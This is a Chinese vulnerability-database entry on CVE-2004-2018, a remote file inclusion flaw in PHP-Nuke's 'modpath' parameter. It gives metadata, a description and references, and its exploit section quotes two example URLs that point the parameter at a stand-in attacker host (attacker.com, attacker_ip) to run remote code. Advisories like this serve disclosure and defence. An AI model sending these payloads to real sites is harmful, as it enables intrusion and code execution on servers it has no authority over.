PHP-Nuke Modpath参数文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107951 漏洞类型 输入验证
发布时间 2004-05-17 更新时间 2006-09-28
CVE编号 CVE-2004-2018 CNNVD-ID CNNVD-200412-315
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24127
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-315
|漏洞详情
PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。PHP-Nuke存在文件包含问题,远程攻击者可以利用这个漏洞以WEB进程权限查看系统任意文件内容。PHP-Nuke对用户提交给'modpath'参数的数据缺少过滤,攻击者可以指定远程服务器上的恶意文件作为包含文件,可以以WEB进程权限执行恶意文件中的任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/10365/info

PHP-Nuke is prone to a potential file include vulnerability. This issue could allow a remote attacker to include malicious files containing aribtrary code to be executed on a vulnerable system. This issue can be exploited via the 'modpath' parameter.

If successful, the malicious script supplied by the attacker will be executed in the context of the web server hosting the vulnerable software.

http://www.example.com/nuke73/index.php?modpath=ftp://attacker.com/directory/
http://www.example.com/nuke73/index.php?modpath=//attacker_ip/share_name/
|参考资料

来源:XF
名称:phpnuke-modpath-file-include(16218)
链接:http://xforce.iss.net/xforce/xfdb/16218
来源:www.waraxe.us
链接:http://www.waraxe.us/index.php?modname=sa&id=29
来源:BID
名称:10365
链接:http://www.securityfocus.com/bid/10365
来源:OSVDB
名称:6222
链接:http://www.osvdb.org/6222
来源:SECUNIA
名称:11625
链接:http://secunia.com/advisories/11625
来源:BUGTRAQ
名称:20040517[waraxe-2004-SA#029-PossibleremotefileinclusioninPhpNuke6.x-7.3]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108482888621896&w=2
来源:FULLDISC
名称:20040517[waraxe-2004-SA#029-PossibleremotefileinclusioninPhpNuke6.x-7.3]
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-05/0870.html
来源:NSFOCUS
名称:6458
链接:http://www.nsfocus.net/vulndb/6458